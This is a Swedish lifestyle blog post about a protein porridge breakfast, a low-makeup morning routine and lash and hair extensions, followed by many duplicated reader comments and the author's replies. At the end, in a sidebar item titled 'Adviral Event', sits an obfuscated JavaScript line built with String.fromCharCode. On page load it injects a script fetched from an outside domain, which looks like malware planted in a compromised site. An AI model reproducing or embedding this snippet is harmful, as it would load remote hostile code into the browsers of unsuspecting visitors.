Fuska med stil!!!! ;)

Proteingröt-105

Godmorgon! Sovmorgon, mys med Lilleman, INGENTING planerat idag. Kan inte ens minnas när jag hade en sån dag sist! Känns underbart! Igårkväll åt vi tacos hos vänner, tittade på Let’s Dance! Guuuud vad duktiga alla har blivit! Dom är så modiga, förstår ni pressen att leverera i direkt sändning inför hela svenska folket! -grymt bra jobbat! Jag la min röst på Bianca & Alex, igen!  Såååå duktig! imagepå bilden längst upp ser du min nya lösning vid fantasibrist & tidsbrist! Frukosten är det viktigaste målet! (För mig) om jag skulle välja ett mål om dagen så skulle jag välja frukost!

”färdig-mat” är någonting jag tidigare förknippade med skräpmat. Dåliga råvaror, och dålig smak, näringsfattigt osv. Men i vårat stressade karriärsamhälle vi lever i så har även ”snabbmats” branschen hakat på hälsotrenden. Ett måste för att överleva! Jag fick för ett tag sedan upp ögonen för denna Protein gröt. Högt protein och inget socker! Som dessutom smakar grymt bra! Äpple och kanel smak. Jag håller mig mätt fram till lunch och vet att jag fått i mig allt jag behöver! Snabbt och enkelt att tillaga, passar min hektiska vardag perfekt! En frukost jag äter flera dagar i veckan! 🙂 dessutom lätt att ta med sig i väskan även på resande fot 😉image imageLilleman tröttnar aldrig på sin Nalle-korv! 🙂

Jag fick några kommentarer om att mitt hår som ”alltid sett så fint ut” att det blivit risigt.

Saken är sen att sedan jag kom hem från Portugal så har jag varit på resande fot eller haft full fart med jobb…. Dagarna har gätt i ett! MEN, jag kom på en fiffig grej i Portugal, om jag på kvällen flätar två flätor hårt, sprayar med lite leav-in produkter och sedan sover med dom så kan jag på morgonen bara släppa ut håret utan att knappt borsta det.

Dessutom har jag en grund-solbränna som gör att jag slipper sminka mig. Detta i kombination med att jag har 3D tatuerade bryn och fransar som en tjej här ifrån Sigtuna fixade innan redan. Bor du i Sigtuna orådet så kan jag varmt rekommendera henne  (Du hittar henne HÄR )

Detta innebär att det tar mig ca 6minuter att kliva ur sängen, tvätta ansiktet och borsta tänderna! SÅ skönt!!! image en osminkad sanning just nu! Hyn är i bra skick, jag har min hudsjukdom Rosacea under kontroll (peppar, peppar…) en sjysst bränna OCH med bryn och fransar fixade så behöver jag inte ens tänka tanken på att sminka mig! Bara insmord i en fuktkräm med solskyddsfaktor 30 i ansiktet! Jag är inte als sådär ”fåfäng” som man kanske kan tro genom bilder och blogg! 😉

”FUSKA MED STIL!”

Jag gillar att testa nya grejer och tycker inte det är fel med  fransar och extensions. MEN ska man ta till hjälpmedel som jag gör så ska man försöka att göra allt så ”naturligt” som möjligt… Man ska helst inte kunna se att det är lös-fransar/hår osv. En svår balansgång, men det är nyckeln till en ”Classy look” Vad tycker du? Ser jag ändå inte ganska naturlig ut trots fransar, hår osv??

-Ärligt svar nu, jag tål kritik! 😉  kram

/My Martens

110 Komentarer

 1. Låt inga klaga på dig eller ditt hår….du är en äkta skönhet….& ser naturlig ut..Dom som har synpunkter utan att du bett om det är bara avundsjuka.Kram
  Kram

 2. Bianca är såå duktig o vacker, känner du henne? Dina fransar ser inte helt naturliga ut med de är snygga. Har du gjort dina bryn o fransar i Sigtuna? Skönt slippa sminka sig. Trevlig helg!

 3. Fin bild på dig !
  Jag hade nog tagit lite kortare ögonfransar nästa gång för att få det till att se mera äkta ut (om det nu är det man är ute efter )
  Jag tycker fort att man kan se på oäkta hår att det ser slitet ut i topparna spec när man har långt hår isatt som dig.Hade gått för kortare & bara för att fylla ut ditt eget hår istället.
  Men det viktigaste är ju att du är nöjjd med ditt utseende! Detta var bara min åsikt sen du bad oss om att kommentera.
  Önskar dig & din son en fin helg!

 4. Ärligt svar : det går alltid att se att det är löshår på alla som har det … o numera har ju alla fejkfransar och det ser man också .. men det är ett fritt land och man gör som man vill ,men att tro att nån går på att detta ska vara äkta så bedrar man sig ….

 5. Låt inga klaga på dig eller ditt hår….du är en äkta skönhet….& ser naturlig ut..Dom som har synpunkter utan att du bett om det är bara avundsjuka.Kram
  Kram

 6. Hej!
  Fick för mig att du gjorde dina ögonbryn i Kalmar? Hur länge håller ögonfransarna? Är det typ som att man färgar dom? Har du gjort botox/fillers?
  Kram

 7. Lite färg i ansiktet, markerade bryn och fina fransar gör så mycket. Du har väldigt fin hy i ansiktet oxå. Skönt att slippa fixa sig på morgonen.
  Vart har du fixat dina ögonbryn?
  Kram Saga

 8. Hej. Jag vill börja med att kommentera din glitterklänning, dina skor och dina bikinis när du var i Portugal. Ett stort WOW. Du var SUPERSNYGG i både klänning skor och bikini. Du ber här om ett ärligt svar om att fuska med stil . Jag tycker ögonbryn och fransar är snygga men jag har svårt att förlika mig med extensions. Jag tycker de är livlösa och inte speciellt snyggt. Det är inte bara dina utan de flesta som jag ser som bär extensions. De bilder du lägger ut när de är nygjorda är ganska vackra men sedan tycker jag de förlorar i glans och naturlighet. Långa, täta ögonfransar är jag svag för och de är vackra på dig. Trots min ålder(jag är 68 år ung ? ) så önskar jag att jag hade mod nog att förlänga och förtäta mina ögonfransar, men jag är rädd för att det inte riktigt passar vid min ålder. Jag är nog mest orolig för underhållet. Så kontentan av det hela är att jag tycker det är helt ok att fuska med stil men jag gillar inte extensions. ?

 9. Bianca är såå duktig o vacker, känner du henne? Dina fransar ser inte helt naturliga ut med de är snygga. Har du gjort dina bryn o fransar i Sigtuna? Skönt slippa sminka sig. Trevlig helg!

 10. Fin bild på dig !
  Jag hade nog tagit lite kortare ögonfransar nästa gång för att få det till att se mera äkta ut (om det nu är det man är ute efter )
  Jag tycker fort att man kan se på oäkta hår att det ser slitet ut i topparna spec när man har långt hår isatt som dig.Hade gått för kortare & bara för att fylla ut ditt eget hår istället.
  Men det viktigaste är ju att du är nöjjd med ditt utseende! Detta var bara min åsikt sen du bad oss om att kommentera.
  Önskar dig & din son en fin helg!

 11. Ärligt svar : det går alltid att se att det är löshår på alla som har det … o numera har ju alla fejkfransar och det ser man också .. men det är ett fritt land och man gör som man vill ,men att tro att nån går på att detta ska vara äkta så bedrar man sig ….

 12. Du var verkligen jättefin i kort hår på Halloween (tror jag det var?)!! Frisyren nu ger jag ingen kommentar till…:S Fransar och bryn fina, men man är nog lite fåfäng om man just fixar sånt ?

 13. Hej!
  Fick för mig att du gjorde dina ögonbryn i Kalmar? Hur länge håller ögonfransarna? Är det typ som att man färgar dom? Har du gjort botox/fillers?
  Kram

 14. Lite färg i ansiktet, markerade bryn och fina fransar gör så mycket. Du har väldigt fin hy i ansiktet oxå. Skönt att slippa fixa sig på morgonen.
  Vart har du fixat dina ögonbryn?

  Kram Saga

 15. Hej. Jag vill börja med att kommentera din glitterklänning, dina skor och dina bikinis när du var i Portugal. Ett stort WOW. Du var SUPERSNYGG i både klänning skor och bikini. Du ber här om ett ärligt svar om att fuska med stil . Jag tycker ögonbryn och fransar är snygga men jag har svårt att förlika mig med extensions. Jag tycker de är livlösa och inte speciellt snyggt. Det är inte bara dina utan de flesta som jag ser som bär extensions. De bilder du lägger ut när de är nygjorda är ganska vackra men sedan tycker jag de förlorar i glans och naturlighet. Långa, täta ögonfransar är jag svag för och de är vackra på dig. Trots min ålder(jag är 68 år ung 😉 ) så önskar jag att jag hade mod nog att förlänga och förtäta mina ögonfransar, men jag är rädd för att det inte riktigt passar vid min ålder. Jag är nog mest orolig för underhållet. Så kontentan av det hela är att jag tycker det är helt ok att fuska med stil men jag gillar inte extensions. 🙂

 16. Fransarna är för långa för att se äkta ut, tyvärr så är ditt hår inte snyggt på grund av för långa extensions! Kolla in Maggan … såå snygg och ser helt naturlig ut trots lite fusk ? för att inte tala om Hannah, där snackar vi verkligen classy! Du har ju verkligen de bästa rådgivarna i din vänkrets, så ta vara på det ! Kram från en genomärlig människa.

 17. Va glad jag blir när jag hör att du har rosacea!! Inget illa ment, bara att då finns det hopp för mig som har samma problem!! kan du inte berätta vilka ansiktsprodukter du använder till vardags? Rengöring och kräm? Har provat alla möjliga dyra rosacea krämer men inget hjälper bra, stress gör ju saken sämre på mig. Vad påverka din rosacea mest?
  kram!

  • stress är det som påverkar mig mest. jag gick på antibiotika hela förra sommaren, fick inte vistas i solen på fyra månader. men det hjälpte mig. så det var värt det! =) jag använder exuviance (för rosacean) och är noga med att aldrig gå och lägga mig med smink osv =) Kram

 18. Hej fina,
  Nej varken ditt löshår eller lösfransar ser naturligt ut. Varken på bild eller i verklighet.
  När du nu frågar så är det ditt löshår som ser minst naturligt ut.
  Önskar dig allt gott. Det är ju insidan som räknas.

 19. Du tål inte kritik! Du klarar inte av att se mina kommentarer.. ? Mitt i prick med andra ord! Sanningen är svår att ta till sig ibland… Vad gäller ditt utseende så var du tusen gånger finare förut då du såg naturell ut. Dvs utan löshår fixade fransar, bryn, bröst osv.. Så fin på några bilder från när sonen är liten. Nu ser du tyvärr ” billig” ut. Sorry to say it men så är det.. ingen classy woman som du kanske tror eller tycker.
  Klädstilen ser också billig ut med väldigt korta kjolar och höga klackar.. om man har stil så ser man ut som ex Hanna Graaf – vet ju att du käner henne. Snygg och avslappnad stil!!

  • När Ludvig var liten så var det samma bröst, samma extensions märke… MEN en annan nageln teknolog =) Har använt det i ca 10 år. Jag trivs bra med det…. det är huvudsaken =) ”Om man har stil ser man ut som Hannah Graaf” fniss! ja, det vore ju kul om all såg likadana ut! ? -trevlig helg!

   • Du sa att du klarade av kritk men nej det gör du inte! ? Ja Hanna är ett exempel på en person medklass – dvs bra smak , enkelt och snyggt!! Finns många fler såklart .. Även om nu bröst och extensions var samma så var utrycket helt annat.. en ärlig åsikt helt enkelt! Ser så mycket mer ”avskalat” ut och naturligt..Håret ser idag risigt och för mkt ut.. Ja om du nu trivs så bra.. varför be om en åsikt?!?

    • ”klarar inte av dom” Bara för att du inte tycker som jag, så påstår jag ju inte att du inte ”klarar av” min åsikt! Jag tycker det är bra att vi alla tycker olika, hur tråkigt vore det annars? ? Sen innebär inte mitt inlägg, och min fråga att vi alla behöver tycka exakt samma ska. Du tycker att jag ser onaturlig och ”avskalad” ut, ja det får stå för dig =) jag tycker ingenting om det, jag är inte arg på dig, inte upprörd, besviken eller dyl…. Däremot förvånad över hur trångsynt du är som målar upp någon bild inne i ditt huvud att jag inte klarar av kritik pga utav att vi inte tycker lika =) Knasigt! Men inga hard feeling från min sida för det, ha en skön söndag gumman!

     • Om man kikar på dina kommentarer utefter vad andra kommenterat så så känns tonen ganska vass.. Dvs att du går till motangrepp. Skriver en person att du är ful rätt av så förstår jag det men om en kommentar är ett svar på ditt inlägg med en åsikt så borde du nog avstå att kommentera.. Fler än jag märker att du tar åt dig även om du inte gör det enligt dig!
      Jag svarade ärligt.. Visst kan man göra både fransar, bröst, naglar osv. Inget som jag har emot men man kan göra det på olika sätt… Jag är inte trångsynt.. bara ärlig! För oss som läser så låter dina kommentarer kanske på ett annat sätt än vad du tror.. så kan det vara. No hard feelings! Bara sanningen… Alla får se ut som de vill.. visst vore det tråkigt annars men om man ber om en åsikt, så JA ta bort löshåret och få en mer naturlig look, som sagt SÅ fin på gamla bilder, vet inte exakt ifrån när men en lite mer ”avskalad look”. En personlig åsikt och absolut välmenande!!!

     • Tack för din åsikt Malin ? anledningen att det är en ”vass” ton mot en eller två, är att dom BARA skriver negativa saker här inne…… ?

 20. Du var verkligen jättefin i kort hår på Halloween (tror jag det var?)!! Frisyren nu ger jag ingen kommentar till…:S Fransar och bryn fina, men man är nog lite fåfäng om man just fixar sånt 😉

 21. Håret är inte snyggt i min smak. Vi fick ju skriva vad vi tycker. Så ta inte illa upp men ta bort löshår så syns ansiktet bättre nu är det bara en hårman som syns. Ha det bra .

  • Klart man få säga vad man tycker =) det är inte samma sak som att sprida näthat och gå till personangrepp =) Men jag älskar ”min man” så den får vara kvar =) -trevlig helg!

 22. Får man fråga var i Kalmar som du har gjort dina ögonbryn? Ska dit i sommar;). Har du fixat dina bröst mer än en gång? Dom ser större ut nu än i ensam mamma söker:);) kram o ha en trevlig kväll

 23. Fransarna är för långa för att se äkta ut, tyvärr så är ditt hår inte snyggt på grund av för långa extensions! Kolla in Maggan … såå snygg och ser helt naturlig ut trots lite fusk 🙂 för att inte tala om Hannah, där snackar vi verkligen classy! Du har ju verkligen de bästa rådgivarna i din vänkrets, så ta vara på det ! Kram från en genomärlig människa.

 24. Va glad jag blir när jag hör att du har rosacea!! Inget illa ment, bara att då finns det hopp för mig som har samma problem!! kan du inte berätta vilka ansiktsprodukter du använder till vardags? Rengöring och kräm? Har provat alla möjliga dyra rosacea krämer men inget hjälper bra, stress gör ju saken sämre på mig. Vad påverka din rosacea mest?
  kram!

  • stress är det som påverkar mig mest. jag gick på antibiotika hela förra sommaren, fick inte vistas i solen på fyra månader. men det hjälpte mig. så det var värt det! =) jag använder exuviance (för rosacean) och är noga med att aldrig gå och lägga mig med smink osv =) Kram

 25. Hej fina,
  Nej varken ditt löshår eller lösfransar ser naturligt ut. Varken på bild eller i verklighet.
  När du nu frågar så är det ditt löshår som ser minst naturligt ut.
  Önskar dig allt gott. Det är ju insidan som räknas.

 26. Bukplastik bröstoperation, lösnaglar, löshår,lösögonfransar och tatuerade bryn. Naturlig? Naturlig look? tyvärr. Som nån skrev. Det syns. Men om du trivs så är det huvudsaken. Blir mest förvånad över att man ena tror att man blir det med alla dom ”ingreppen”. Skulle varit kul och sett hur du sett ut annars. Classy är inte manen. Tyvärr. Mer Cher över den än Hannah Graaf. Men du är fin ändå. Och verkar vara det även på insidan.

 27. Du tål inte kritik! Du klarar inte av att se mina kommentarer.. 😉 Mitt i prick med andra ord! Sanningen är svår att ta till sig ibland… Vad gäller ditt utseende så var du tusen gånger finare förut då du såg naturell ut. Dvs utan löshår fixade fransar, bryn, bröst osv.. Så fin på några bilder från när sonen är liten. Nu ser du tyvärr ” billig” ut. Sorry to say it men så är det.. ingen classy woman som du kanske tror eller tycker.
  Klädstilen ser också billig ut med väldigt korta kjolar och höga klackar.. om man har stil så ser man ut som ex Hanna Graaf – vet ju att du käner henne. Snygg och avslappnad stil!!

  • När Ludvig var liten så var det samma bröst, samma extensions märke… MEN en annan nageln teknolog =) Har använt det i ca 10 år. Jag trivs bra med det…. det är huvudsaken =) ”Om man har stil ser man ut som Hannah Graaf” fniss! ja, det vore ju kul om all såg likadana ut! 😉 -trevlig helg!

   • Du sa att du klarade av kritk men nej det gör du inte! 😉 Ja Hanna är ett exempel på en person medklass – dvs bra smak , enkelt och snyggt!! Finns många fler såklart .. Även om nu bröst och extensions var samma så var utrycket helt annat.. en ärlig åsikt helt enkelt! Ser så mycket mer ”avskalat” ut och naturligt..Håret ser idag risigt och för mkt ut.. Ja om du nu trivs så bra.. varför be om en åsikt?!?

    • ”klarar inte av dom” Bara för att du inte tycker som jag, så påstår jag ju inte att du inte ”klarar av” min åsikt! Jag tycker det är bra att vi alla tycker olika, hur tråkigt vore det annars? 😉 Sen innebär inte mitt inlägg, och min fråga att vi alla behöver tycka exakt samma ska. Du tycker att jag ser onaturlig och ”avskalad” ut, ja det får stå för dig =) jag tycker ingenting om det, jag är inte arg på dig, inte upprörd, besviken eller dyl…. Däremot förvånad över hur trångsynt du är som målar upp någon bild inne i ditt huvud att jag inte klarar av kritik pga utav att vi inte tycker lika =) Knasigt! Men inga hard feeling från min sida för det, ha en skön söndag gumman!

     • Om man kikar på dina kommentarer utefter vad andra kommenterat så så känns tonen ganska vass.. Dvs att du går till motangrepp. Skriver en person att du är ful rätt av så förstår jag det men om en kommentar är ett svar på ditt inlägg med en åsikt så borde du nog avstå att kommentera.. Fler än jag märker att du tar åt dig även om du inte gör det enligt dig!
      Jag svarade ärligt.. Visst kan man göra både fransar, bröst, naglar osv. Inget som jag har emot men man kan göra det på olika sätt… Jag är inte trångsynt.. bara ärlig! För oss som läser så låter dina kommentarer kanske på ett annat sätt än vad du tror.. så kan det vara. No hard feelings! Bara sanningen… Alla får se ut som de vill.. visst vore det tråkigt annars men om man ber om en åsikt, så JA ta bort löshåret och få en mer naturlig look, som sagt SÅ fin på gamla bilder, vet inte exakt ifrån när men en lite mer ”avskalad look”. En personlig åsikt och absolut välmenande!!!

     • Tack för din åsikt Malin 🙂 anledningen att det är en ”vass” ton mot en eller två, är att dom BARA skriver negativa saker här inne…… 🙂

 28. Håret är inte snyggt i min smak. Vi fick ju skriva vad vi tycker. Så ta inte illa upp men ta bort löshår så syns ansiktet bättre nu är det bara en hårman som syns. Ha det bra .

  • Klart man få säga vad man tycker =) det är inte samma sak som att sprida näthat och gå till personangrepp =) Men jag älskar ”min man” så den får vara kvar =) -trevlig helg!

 29. Du är jättefin, men om jag ska vara ärlig tycker jag du ska korta och tunna ner löshåret, kanske göra det liiite mörkare eller lite ombre/bayalage. Lite kortare fransar så hade det sett ännu mer naturligt ut. Men som sagt är du jättefin och verkar va en riktigt go tjej<3 kraaam

 30. Får man fråga var i Kalmar som du har gjort dina ögonbryn? Ska dit i sommar;). Har du fixat dina bröst mer än en gång? Dom ser större ut nu än i ensam mamma söker:);) kram o ha en trevlig kväll

 31. Bukplastik bröstoperation, lösnaglar, löshår,lösögonfransar och tatuerade bryn. Naturlig? Naturlig look? tyvärr. Som nån skrev. Det syns. Men om du trivs så är det huvudsaken. Blir mest förvånad över att man ena tror att man blir det med alla dom ”ingreppen”. Skulle varit kul och sett hur du sett ut annars. Classy är inte manen. Tyvärr. Mer Cher över den än Hannah Graaf. Men du är fin ändå. Och verkar vara det även på insidan.

 32. Du är jättefin, men om jag ska vara ärlig tycker jag du ska korta och tunna ner löshåret, kanske göra det liiite mörkare eller lite ombre/bayalage. Lite kortare fransar så hade det sett ännu mer naturligt ut. Men som sagt är du jättefin och verkar va en riktigt go tjej<3 kraaam

 33. Jag tycker nog egentligen inget alls om ditt utseende. Alla får se ut precis som dom vill, huvudsaken är att man själv är nöjd. Men jag har en annan fråga… Har du väldigt dåligt självförtroende? Jag tänker att du verkar inte kunna vara dig själv rent utseendemässigt… Bröst, hår, naglar, fransar osv. Känns inte som att budskapet i slutändan blir ’Var nöjd med dig själv’. Det är bara en fundering inte en värdering av dig!

  • Jag är nöjd med mig själv, jag trivs ? vi lever ändå på 2016 talet, möjligheterna finns… Jag tycker precis som du att det är upp till var och en ? men jag stör för vad jag gör, vad jag tycker och är ärlig om det! Bröst gjordes efter gravititet för fem år sedan ? ingen big deal för mig:) ”nöjd som man är” trygghet och självkänsla kommer inifrån ? det finns inga naglar eller fransar i världen som skapar ett självförtroende ?

   • Jag förstår hur du menar men jag tror du missförstår mig. Jag tänker att under ytan/utseendet döljer sig en människa som man ’maskerar’ med ett annat utseende än det man tilldelats. Jag lägger absolut inga värderingar i att människor gör ingrepp eller har löshår,naglar, fransar osv. Tänker mer att nöjd som man är inte kan komma inifrån om man ändrar sitt utseende? Jag tycker du är fri att göra precis som du vill. Bara DU är lycklig och nöjd. Trevlig fortsatt helg ?

 34. Jag tycker nog egentligen inget alls om ditt utseende. Alla får se ut precis som dom vill, huvudsaken är att man själv är nöjd. Men jag har en annan fråga… Har du väldigt dåligt självförtroende? Jag tänker att du verkar inte kunna vara dig själv rent utseendemässigt… Bröst, hår, naglar, fransar osv. Känns inte som att budskapet i slutändan blir ’Var nöjd med dig själv’. Det är bara en fundering inte en värdering av dig!

  • Jag är nöjd med mig själv, jag trivs 🙂 vi lever ändå på 2016 talet, möjligheterna finns… Jag tycker precis som du att det är upp till var och en 🙂 men jag stör för vad jag gör, vad jag tycker och är ärlig om det! Bröst gjordes efter gravititet för fem år sedan 🙂 ingen big deal för mig:) ”nöjd som man är” trygghet och självkänsla kommer inifrån 😉 det finns inga naglar eller fransar i världen som skapar ett självförtroende 🙂

   • Jag förstår hur du menar men jag tror du missförstår mig. Jag tänker att under ytan/utseendet döljer sig en människa som man ’maskerar’ med ett annat utseende än det man tilldelats. Jag lägger absolut inga värderingar i att människor gör ingrepp eller har löshår,naglar, fransar osv. Tänker mer att nöjd som man är inte kan komma inifrån om man ändrar sitt utseende? Jag tycker du är fri att göra precis som du vill. Bara DU är lycklig och nöjd. Trevlig fortsatt helg 🙂

  • Hej Anna! Har du någon gång prövat att skriva något snällt här inne? Den enda gången du Anna Nordberg går in och kommenterar är just om det finns någonting att ”trycka till mig med” =)
   Det är tvådelat, självKlart både bryr jag mig om vad folk skriver, men ändå vinde vad folk tycker om MINA beslut. Jag ställde en fråga, gav MIN åsikt kring ett ämne som enligt vissa är lite tabu belagt =) Folk behöver inte tycka som jag, jag tränar, reser, stylar mig för andras skull… utan helt för min egen skull =) Vissa inspirerar det, andra retar det. DET bryr jag mig inte om =) Tycker alltid att det är intressant att höra folks åsikter, och jag hänger inte ut någon för det. Eller blir upprörd. Men jag är inte heller trångsynt, jag tycker det är bra att vi alla inte tycker lika =) Ha en skön helg!

  • Hej Anna! Har du någon gång prövat att skriva något snällt här inne? Den enda gången du Anna Nordberg går in och kommenterar är just om det finns någonting att ”trycka till mig med” =)

   Det är tvådelat, självKlart både bryr jag mig om vad folk skriver, men ändå vinde vad folk tycker om MINA beslut. Jag ställde en fråga, gav MIN åsikt kring ett ämne som enligt vissa är lite tabu belagt =) Folk behöver inte tycka som jag, jag tränar, reser, stylar mig för andras skull… utan helt för min egen skull =) Vissa inspirerar det, andra retar det. DET bryr jag mig inte om =) Tycker alltid att det är intressant att höra folks åsikter, och jag hänger inte ut någon för det. Eller blir upprörd. Men jag är inte heller trångsynt, jag tycker det är bra att vi alla inte tycker lika =) Ha en skön helg!

 35. Hej My!
  Ville bara säga att du har en jättebra blogg, skriver bra om vardagens plus och minus ärligt.. gillar att följa din resa här! Dessutom så ser då fabulous ut!.. lite fina kurvor och jättesnygg!

 36. Hej My!

  Ville bara säga att du har en jättebra blogg, skriver bra om vardagens plus och minus ärligt.. gillar att följa din resa här! Dessutom så ser då fabulous ut!.. lite fina kurvor och jättesnygg!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/